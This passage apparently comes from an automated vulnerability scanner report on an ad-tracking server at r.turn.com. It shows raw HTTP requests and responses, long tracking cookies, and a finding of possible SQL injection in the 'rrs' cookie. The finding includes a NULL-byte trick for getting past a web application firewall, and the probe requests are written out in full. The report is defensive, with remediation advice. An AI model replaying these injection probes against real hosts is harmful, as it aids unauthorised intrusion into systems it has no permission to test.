xhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138''; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:23 GMT; Path=/
Set-Cookie: pf=S-e6zHsuseIlMTG4jCTdV-0gCswZCfCygjdSABuWn0oStJHO4dSC7tcSjJ5dCIRNZDpM35cC-2bkiEEmtUQhePoeA2UJNSjq3A3ER1KjcuMdRoGs9UmTmTpFJBUogllMq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdDsxHjSmSqPZDhW_CwkUEmOStrfC9SER61onVprd_onMryjVa6LMEO3kCLjO0IvNryW-5O2fQU_LHsnkesyo4l1ninJgxH9woXm2rr-dAVJeAGRLyWCf_R9HjoKJrFBJztnA0SKf0AeMQvlUxM5fuDYkU_N-HaJfQ2mSe79hy0rTkr_88z-lIzqs0Ol8dwnu5yLplyjYEIvupA0I7pwi0-348FKCYaQBvgSAabtXi-fpQyjXOC_JcYZiQotF0kInhYRcKu0mjXc_6HE2rVAFPqhBQ0jlTps3Fwq04fir6wTUJzHKXlDlRanZxCZCQyk6lMqaWlf-UinNwmNpfMC4c6uyHHnEsvNIqYpDceKYGqv9q-il3AeJAASLwAs1050Tj1_RXLdZ4YH-Z0KqDvWEjztrWS1UhomoFl5YqlWui_0Su-_lPTnCNAusVM0T5cURItoniM0a5isrpqxa8OCIjS6TnUfXOQDidbAP_eMCMR4OsCXVtbSu3VCb-SPB8-48PyD4rNtf3E_Ik2mzgV2yfZqhKPj3cEaMIp7bjLFyeC5-rHm_-GZGmeTVrwxwTeL1cpOEH5V1jWK4p4IcVMVbRtyErkapfdU6UeQ-2uXgaTX8d3xYWjXuv6Xso_GWSCxJO-yAedT9lU-24b_pwCRN2bLn2T-PGXGUbdGpj_x88ee0BbV5isvxTPt9CL0PnheTtKYmO0_8Omb3stvz62bZIshLIPaZMc1uyxZOBshjQpjasJ5ZXxe9Txls8260OcYp080OKRhrwP1aHW6KOpeZltWYFO5rwOWd9jq-KL36nBMAPvv4Wi21X1t5b8cFUABM4rByRIjFDUoSjcaAEBXTOPdpkIYjQDuEnrAMpBz09-N5nXh9DYf8rgXYEKPvr41lO6Rc3UztnWE4E7H6lg6pFOwLXkbMMyjGQbpC32tSXF_fPgSAAdJPCg2aibKad83PI1bBYLXepGCThsYriZvRp6BcJPKi3DJg5b3K8RfkrUPmGMCv4_cgIM15CoZm21ra5tAYQXV-HFqGk4-9vGMX4cRsfLQTKeWcvH5tuPJ41gCKmaZ5sFflhNPeaGb8iD0vobCBbptTiMDtKXMfE8F6rGhmTGWml0U-dioAHL67SPRfNgqDPymBO5eTCVQhfuoFqgMOqEG5tC6qLpQerH4SLCiNKN8xM_krVMX-bkjkDchP7fMS2_kyQNzFt4FjPKGnWa4oXJQ3DINuCENZrLEjKBp0ouaBT6TNwtU_eRYGldhYXzWfsFkgKAvnpKkZW2CopYK6joUv4cw1D7GXwSXdhYVQAo9tcmGkyBhPFQWZMGdIUOi2nbuz7oIR_myJuMtAG-p0YFCnBlxJRhPvw0uEYnLtjT_EEFMBHXSBhl4iNIpF_LSDDh7u2cxVbe-eXQkkGbPpPYvrYzw24WkNGCP_7E3_IoEWmOXMgp48jsFQ9jktNPVtboxL4HZznybuXKwX6KijyEsYOCTHPsH7rLzoi-uiH6MYUVWruk5bWAW-_lwoZskScGE90lTfFi3d_YWZPAXOZP_Esyu1_9wbvw5FxCdftGz1WwsPYCRq_wfMQ76qEkVoidGlyiXGfkZv9SHpnDoD8ZYPyOBlRkLLbN_lonaZtqMBoxG7Uiy9Fzo3licLkSCZJAQKibDTSE7IeDWe_bzT7mFbp855eEbvgJVG4Tpa9pVpcQIt82dyTg2I_ITtU8n_B8rQwVdc_JV_kZ-Zuz__ZCxq1c-2K8_Wnr6YEZ0LwiNNWXaAt9HOlEx8uaQmL20D9vzsmqf97eArbBzMbH8JaP33lkbgn1rJkbwDNpvXf-Jzpubeo-ViW6ovbLSNpT46q3WB2ibjMkgV8PBn08xexXZE8uVcqFU6QLNZIAwfLw2RX0aXE4PmNxp2VymgVX783j9NCggbKJc4keKyRbHVkBN_qOvpXsILJUWiTWsbqnKFSqbYUfMSIMnqx_6lpxdbCej6wEF9mLzk21blC378EcMWb3oAv4eW_PqIHgGqmqCgr77Znx1i02Us0TT8g8IYaDgm525j3XPT4b08USzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25uBGXwNOIaLq6t39p22PaZg; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:23 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:23 GMT


1.13. http://r.turn.com/r/beacon [rrs cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The rrs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rrs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%00'; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:18 GMT; Path=/
